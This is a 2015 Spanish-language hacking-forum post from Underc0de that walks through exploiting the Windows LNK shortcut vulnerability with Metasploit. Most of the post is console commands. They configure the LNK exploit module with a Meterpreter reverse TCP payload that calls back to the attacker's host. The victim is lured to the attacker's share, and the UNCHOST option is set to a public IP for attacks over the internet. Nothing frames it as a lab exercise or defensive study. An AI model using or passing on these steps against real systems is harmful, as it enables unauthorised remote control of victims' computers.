Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Payasako en Febrero 17, 2015, 06:07:57 PM

Título: Metasploit [Explotar Vulnerailidad LNK]
Publicado por: Payasako en Febrero 17, 2015, 06:07:57 PM
Hola a todos de Underc0de, hoy os voy a explicar y poner los pasos para explotar la vulnerabilidad LNK de Windows con Metasploit.

Primero hay que actualizar Metasploit.
Código (text) [Seleccionar]
#msfupdate

Luego configuramos Metasploit como sigue:
Código (text) [Seleccionar]
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.0.33 SRVHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set URIPATH / URIPATH => / msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.0.33 LHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LPORT 4444 LPORT => 4444 msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit


Luego en el navegador de la PC víctima visitamos la siguiente URL:
Código (text) [Seleccionar]
\192.168.0.33QueHeTwEW

Entonces se abrirá el explorador de windows para visualizar los archivos compartidos que contienen el archivo .LNK que produce la ejecución del payload.

Para especificar una dirección diferente para el recurso compartido agregamos este parámetro en la configuración:
Código (text) [Seleccionar]
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set UNCHOST 192.168.0.254 UNCHOST => 192.168.0.254

Esto puede ser necesario para explotar la vulnerabilidad en WAN. En este parámetro iría nuestra IP publica.

Bueno espero que os haya ayudado. ¡Saludos!